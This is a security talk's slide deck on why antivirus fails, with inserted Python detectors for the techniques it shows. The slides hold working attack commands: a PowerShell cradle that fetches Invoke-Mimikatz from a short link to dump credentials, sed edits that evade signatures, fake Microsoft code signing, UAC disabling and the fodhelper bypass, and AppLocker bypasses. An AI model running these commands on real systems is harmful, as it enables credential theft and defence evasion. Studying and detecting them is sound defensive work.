Antivirus is hopeless

Endpoint protection is not enough. By Sumedt Jitpukdebodin Senior Security Researcher @ I-SECURE
Page 1: Antivirus is hopeless

Endpoint protection is not enough.

By Sumedt Jitpukdebodin

Senior Security Researcher @ I-SECURE

Page 2: Antivirus is hopeless

How Antivirus works

• Based on heuristic

• Based on signature

• Based on cloud

Page 3: Antivirus is hopeless

Malware Statistics

Page 4: Antivirus is hopeless

Distribution of malware under Windows in 2016

Page 5: Antivirus is hopeless

Top 10 malware file extensions, Q1 2017

Page 6: Antivirus is hopeless

Evasion Techniques

• Anti-security techniques (Avoid detection)

• Anti-sandbox techniques (Avoid automatic analysis)

• Anti-analyst techniques (Avoid analysis)

Page 7: Antivirus is hopeless

Anti-security techniques

• Obfuscation

• Crypter

• Packer

• FUD (Fully UnDetectable by antimalware)

• etc.

Page 8: Antivirus is hopeless

Frameworks for generating antivirus-bypassing malware

• Veil

• TheFatRat

• Winpayloads

• Dr0p1t-Framework

• Avet

• VBad

• Obfuscated Empire

• OWASP-ZSC

• etc

Page 9: Antivirus is hopeless

Invoke-Mimikatz

• powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Page 10: Antivirus is hopeless

Just a Mimikatz

• sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1

• sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

• sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

• sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

• sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

• sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1

• sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

Page 11: Antivirus is hopeless

Just a Mimikatz(2)

• powershell -exec bypass

• Import-Module Invoke-Mimikatz.ps1

• Invoke-Mimidogz

Page 12: Antivirus is hopeless

Sign malware with a fake certificate

• osslsigncode verify <microsoft exe>

• openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem -days 365 -subj "/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation"

• osslsigncode sign -in evil.exe -key fake_microsoft_key.pem -certs fake_microsoft_cert.pem -out evil_signed.exe

Page 13: Antivirus is hopeless
Page 14: Antivirus is hopeless

But running an EXE is so hard…

Page 15: Antivirus is hopeless

Try indirect ways

• Macro

• VBS

• DLL

• HTA (HTML Application)

• PS1

• etc.

Page 16: Antivirus is hopeless

Example of an HTA with VBScript

Page 17: Antivirus is hopeless

Show time

Page 18: Antivirus is hopeless

Show time (2)

Page 19: Antivirus is hopeless

UAC

• User Account Control (UAC)

• Runs programs with standard user rights instead of full administrator rights

• Disable (EnableLUA = 0): C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

• Re-enable (EnableLUA = 1): C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

Page 20: Antivirus is hopeless

Bypass UAC

• Abusing mistakes in autoElevate binaries (use sigcheck to check the autoElevate manifest flag)

• UACME

• DLL hijacking

• autoElevate

• Elevated COM interface

• SDCLT - Backup command

• Fodhelper - Manage Optional Features

• Process or DLL injection into a binary signed with the Windows Publisher certificate

• Using Windows Update Standalone Installer (wusa.exe)

• etc.

Page 21: Antivirus is hopeless

Bypass UAC with Fodhelper

• Fodhelper.exe (%WINDIR%\System32\fodhelper.exe)

• Registry keys missing by default:

• HKCU:\Software\Classes\ms-settings\shell\open\command

• HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute

• HKCU:\Software\Classes\ms-settings\shell\open\command\(default)
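Both UAC pages leave a registry footprint a defender can alert on: the EnableLUA value being set to 0 (page 19) and the per-user ms-settings handler keys, which do not exist on a clean system, being created under HKCU (page 21). The following detector is an added example written for this page, not code from the talk. It assumes Sysmon-style registry events (Event ID 12 for key creation, 13 for value set) with Sysmon's field names; the user SID, user names and file paths in the sample events are constructed.

```python
"""Registry-event detection for the UAC slides: EnableLUA set to 0 (page 19)
and the per-user ms-settings handler keys that fodhelper.exe consults
(page 21). Added example written for this page, not the talk's own code.
The events below are constructed Sysmon-style registry events (Event ID 12 =
key created, 13 = value set); field names follow Sysmon, while the SID, user
names and file paths are invented."""
import re

# Sysmon logs HKCU keys as HKU\<user SID>\..., so match on that form.
MS_SETTINGS_RE = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\Software\\Classes\\ms-settings\\shell\\open\\command(\\.*)?$",
    re.IGNORECASE,
)
ENABLELUA_RE = re.compile(r"\\Policies\\System\\EnableLUA$", re.IGNORECASE)

SID = r"HKU\S-1-5-21-1111-2222-3333-1001"  # constructed user hive
POLICY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
REG = r"C:\Windows\System32\reg.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # page 19: reg.exe ADD ... /v EnableLUA /d 0
    {"EventID": 13, "Image": REG, "User": "LAB\\alice",
     "TargetObject": POLICY + r"\EnableLUA", "Details": "DWORD (0x00000000)"},
    # page 21: the handler key and its two values created under HKCU
    {"EventID": 12, "Image": PS, "User": "LAB\\alice",
     "TargetObject": SID + r"\Software\Classes\ms-settings\shell\open\command",
     "Details": ""},
    {"EventID": 13, "Image": PS, "User": "LAB\\alice",
     "TargetObject": SID + r"\Software\Classes\ms-settings\shell\open\command\DelegateExecute",
     "Details": ""},
    {"EventID": 13, "Image": PS, "User": "LAB\\alice",
     "TargetObject": SID + r"\Software\Classes\ms-settings\shell\open\command\(Default)",
     "Details": r"C:\Users\alice\AppData\Local\Temp\payload.exe"},
    # page 19 again: the /d 1 command that re-enables UAC; not flagged
    {"EventID": 13, "Image": REG, "User": "LAB\\admin",
     "TargetObject": POLICY + r"\EnableLUA", "Details": "DWORD (0x00000001)"},
    # ordinary per-user setting written by Explorer; not flagged
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "User": "LAB\\alice",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def scan_registry_events(events):
    """Return one hit per event that matches a rule, in event order."""
    hits = []
    for ev in events:
        target = ev["TargetObject"]
        details = ev.get("Details", "")
        rule = None
        if ENABLELUA_RE.search(target) and "0x00000000" in details:
            rule = "uac_disabled"
        elif MS_SETTINGS_RE.match(target):
            # Any write to this per-user key is suspicious: it is absent by
            # default and is what fodhelper.exe reads before launching.
            rule = "fodhelper_handler"
        if rule:
            hits.append({"rule": rule, "user": ev["User"], "image": ev["Image"],
                         "target": target, "details": details})
    return hits


if __name__ == "__main__":
    for h in scan_registry_events(SAMPLE_EVENTS):
        print(f"[{h['rule']}] {h['user']} via {h['image']}: {h['target']} {h['details']}")
```

The two rules deliberately fire on the key paths rather than on the process that wrote them, so renaming the tooling (the approach the Mimikatz slides take against antivirus) does not help here; the (Default) value's data tells the responder what was about to run elevated.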

Page 22: Antivirus is hopeless

Show time (3)

Page 23: Antivirus is hopeless

AppLocker

• Application whitelisting

• Covers executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers

• Windows 7 and later

• Configured on a single computer (secpol.msc) or through Group Policy Management (gpmc.msc)

Page 24: Antivirus is hopeless

AppLocker File Types

• Executables: regular .exe and .com applications (cmd.exe, ipconfig.exe, etc.)

• Windows Installer files (.msi, .msp, .mst), typically used to install new software on the machine

• Script files with the extensions .ps1, .vbs, .vba, .cmd and .js

• Packaged apps installed through the Microsoft Store

• DLL files (.dll and .ocx; enabled in the Advanced tab)

Page 25: Antivirus is hopeless

AppLocker Rule Types

• Execution path

• Publisher information

• File hash
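The three rule types fail in different ways, and the bypass page (page 26) and the fake-certificate page (page 12) each exploit one of them. The toy evaluator below is an added example for this page; it is not AppLocker's own logic and simplifies it (file records, signer data and byte contents are constructed; hashes cover the whole byte string, whereas AppLocker hashes the PE without its signature; publisher rules only compare the organisation). It shows why the default `%WINDIR%\*` path rule admits a file dropped in C:\Windows\Tasks until an explicit deny rule is added, why a self-signed "Microsoft Corporation" certificate never satisfies a publisher rule, and why a one-byte change defeats a hash rule.

```python
"""Toy evaluator for AppLocker's path, publisher and hash rules (page 25),
showing how the page-26 exception paths and hash bypass and the page-12 fake
certificate interact with each rule type. Added example for this page; not
AppLocker's own logic, and simplified as described in the comments."""
import fnmatch
import hashlib

WINDIR = r"C:\Windows"


def _norm(path):
    """Expand the one variable we support and fold case, as AppLocker does."""
    return path.replace("%WINDIR%", WINDIR).lower()


def _path_matches(pattern, path):
    # AppLocker's '*' matches any run of characters, including backslashes,
    # so a rule ending in '\*' covers every subdirectory.
    return fnmatch.fnmatchcase(_norm(path), _norm(pattern))


def _rule_matches(rule, f):
    kind = rule["type"]
    if kind == "path":
        return _path_matches(rule["path"], f["path"])
    if kind == "publisher":
        s = f.get("signer")
        # Only a signature whose certificate chains to a trusted root counts.
        # A self-signed certificate whose subject merely reads "Microsoft
        # Corporation" (page 12) has an untrusted chain and never matches.
        return bool(s) and s["chain_trusted"] and s["subject_o"] == rule["publisher"]
    if kind == "hash":
        # Simplification: SHA-256 of the whole byte string. Real AppLocker
        # hashes the PE image without its Authenticode signature.
        return hashlib.sha256(f["data"]).hexdigest() == rule["sha256"]
    raise ValueError(f"unknown rule type {kind}")


def evaluate(f, rules):
    """AppLocker semantics: an explicit deny wins, then any allow, otherwise
    implicit deny (everything not allowed is blocked once rules are enforced)."""
    if any(r["action"] == "deny" and _rule_matches(r, f) for r in rules):
        return "deny"
    if any(r["action"] == "allow" and _rule_matches(r, f) for r in rules):
        return "allow"
    return "implicit-deny"


# Constructed file records; the byte strings stand in for real PE images.
TOOL_BYTES = b"MZ-constructed-tool-v1"
MS_OK = {"subject_o": "Microsoft Corporation", "chain_trusted": True}
MS_FAKE = {"subject_o": "Microsoft Corporation", "chain_trusted": False}
FILES = {
    "cmd": {"path": r"C:\Windows\System32\cmd.exe", "signer": MS_OK, "data": b"MZ-cmd"},
    "tasks_dropper": {"path": r"C:\Windows\Tasks\update.exe", "signer": None, "data": b"MZ-drop"},
    "fake_signed": {"path": r"C:\Users\alice\Desktop\evil_signed.exe", "signer": MS_FAKE, "data": b"MZ-evil"},
    "tool": {"path": r"C:\Tools\tool.exe", "signer": None, "data": TOOL_BYTES},
    "tool_patched": {"path": r"C:\Tools\tool.exe", "signer": None, "data": TOOL_BYTES + b"\x00"},
}

# The stock "allow everything under the Windows folder" rule plus one
# publisher rule and one hash rule for an unsigned internal tool.
DEFAULT_RULES = [
    {"action": "allow", "type": "path", "path": r"%WINDIR%\*"},
    {"action": "allow", "type": "publisher", "publisher": "Microsoft Corporation"},
    {"action": "allow", "type": "hash", "sha256": hashlib.sha256(TOOL_BYTES).hexdigest()},
]
# Hardening: deny the user-writable subdirectories the bypass page names.
HARDENED_RULES = DEFAULT_RULES + [
    {"action": "deny", "type": "path", "path": r"%WINDIR%\Tasks\*"},
    {"action": "deny", "type": "path", "path": r"%WINDIR%\tracing\*"},
]

if __name__ == "__main__":
    for name, f in FILES.items():
        print(f"{name:14s} default={evaluate(f, DEFAULT_RULES):13s} "
              f"hardened={evaluate(f, HARDENED_RULES)}")
```

The hash case cuts both ways: the rule is strict enough that a single changed byte stops matching, which is exactly why the bypass page suggests re-obfuscating the binary, but it also means hash rules only protect software whose binaries do not change.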

Page 26: Antivirus is hopeless

Bypass AppLocker

• Find an exception path

  • "C:\Windows\Tasks"

  • "C:\Windows\tracing"

• Load the file from memory (PowerSploit framework)

  • $ByteArray = [System.IO.File]::ReadAllBytes("C:\users\richard\desktop\mimikatz.exe");

  • Invoke-Expression (Get-Content .\Invoke-ReflectivePEInjection.ps1 | Out-String)

  • Invoke-ReflectivePEInjection -PEBytes $ByteArray

• Obfuscate the exe to change its hash (bypasses hash rules)

• PowerShell without powershell.exe (Casey Smith) (PowerShell Empire)

• Registry key manipulation

• Run a PE file through a Microsoft-signed tool

  • C:\Windows\System32\rundll32.exe

  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe (installs and uninstalls applications from the command prompt)

  • C:\Windows\System32\regsvr32.exe (registers and unregisters DLLs)

  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (builds projects in environments where Visual Studio is not installed)
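Every execution path on this page and the earlier PowerShell pages shows up in process-creation telemetry even when the payload itself is never written to disk in recognisable form. The detector below is an added example written for this page, not code from the talk; it assumes Sysmon-style process-creation events (Event ID 1) with Sysmon's field names, and all hostnames, users, paths and the placeholder URL in the sample events are constructed. It covers the download cradle and `-exec bypass` from pages 9 and 11, execution from the two writable Windows subdirectories and the four Microsoft-signed proxy binaries from this page, and a shell spawned by fodhelper.exe from page 21.

```python
"""Process-creation detection for the execution paths on the page: the
powershell download cradle and -exec bypass (pages 9 and 11), execution from
the writable Windows subdirectories and the Microsoft-signed proxy binaries
under 'Bypass AppLocker' (page 26), and shells spawned by fodhelper.exe
(page 21). Added example for this page, not the talk's own code. Events are
constructed Sysmon-style process-creation events (Event ID 1)."""
import ntpath
import re

# The two user-writable directories under %WINDIR% named on page 26.
WRITABLE_WINDIR = ("c:\\windows\\tasks\\", "c:\\windows\\tracing\\")
# The signed binaries page 26 lists for running other code.
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe", "installutil.exe", "msbuild.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download cradle / in-memory execution / execution-policy bypass markers.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|\biex\b|invoke-expression|-e\w*\s+bypass", re.I)
# Proxy argument pointing at user-controlled content rather than System32.
UNTRUSTED_ARG_RE = re.compile(
    r"c:\\users\\|\\temp\\|\\appdata\\|https?://|c:\\windows\\tasks\\|c:\\windows\\tracing\\", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # page 9: download cradle (URL replaced with a placeholder)
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium",
     "CommandLine": "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')\""},
    # page 11: powershell -exec bypass
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium",
     "CommandLine": r"powershell -exec bypass -File C:\Users\alice\Downloads\run.ps1"},
    # page 26: binary executed from a user-writable Windows subdirectory
    {"Image": r"C:\Windows\Tasks\update.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium", "CommandLine": r"C:\Windows\Tasks\update.exe"},
    # page 26: Microsoft-signed proxies pointed at user-controlled files
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": PS, "IntegrityLevel": "Medium",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,Start"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium",
     "CommandLine": r"MSBuild.exe C:\Users\alice\Desktop\build.xml"},
    # page 21: a shell spawned by fodhelper.exe, already running elevated
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "IntegrityLevel": "High", "CommandLine": r"cmd.exe /c whoami"},
    # benign: rundll32 loading a DLL from System32; not flagged
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def _base(image):
    return ntpath.basename(image).lower()


def classify(ev):
    """Return the names of every rule that fires for one event."""
    image = ev["Image"].lower()
    base = _base(image)
    parent = _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    rules = []
    if image.startswith(WRITABLE_WINDIR):
        rules.append("exec_from_writable_windir")
    if base in PROXY_BINARIES and UNTRUSTED_ARG_RE.search(cmd):
        rules.append("signed_proxy_untrusted_arg")
    if base == "powershell.exe" and CRADLE_RE.search(cmd):
        rules.append("powershell_cradle_or_bypass")
    if parent == "fodhelper.exe" and base in SHELLS and ev.get("IntegrityLevel") == "High":
        rules.append("fodhelper_spawned_shell")
    return rules


def scan_process_events(events):
    """Flatten (image, rule) pairs for every event that triggers a rule."""
    return [(ev["Image"], r) for ev in events for r in classify(ev)]


if __name__ == "__main__":
    for image, rule in scan_process_events(SAMPLE_EVENTS):
        print(f"[{rule}] {image}")
```

The proxy rule keys on where the argument lives rather than on the binary alone, because rundll32.exe and regsvr32.exe run constantly on a healthy host; restricting the alert to arguments under user profiles, temp directories, URLs and the two writable Windows directories keeps it actionable.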

Page 27: Antivirus is hopeless

Show time (4)

Page 28: Antivirus is hopeless

Protecting against malware

• People: security awareness training

• Process: restrict program installation and usage by policy, updates, backups, governance, intelligence, an incident response plan, and more => security team

• Technology: technology supports the people and the processes

  • Backup

  • Antivirus

  • Anti-ransomware

  • Endpoint detection

Page 29: Antivirus is hopeless

Q & A

Page 30: Antivirus is hopeless

Resources

• https://www.blackhillsinfosec.com/?p=5555

• https://github.com/nccgroup/Winpayloads

• https://www.youtube.com/watch?v=6bUoz5ChTOs

• https://github.com/D4Vinci/Dr0p1t-Framework

• https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf

• https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf

• https://github.com/Pepitoh/VBad

• https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros

• https://twitter.com/Andrew___Morris/status/879712530041626627

• https://github.com/cobbr/ObfuscatedEmpire

• https://pentestlab.blog/tag/uac/

• https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/

• https://www.greyhathacker.net/?p=796

• https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189

• https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques

• https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting

• https://github.com/api0cradle/UltimateAppLockerByPassList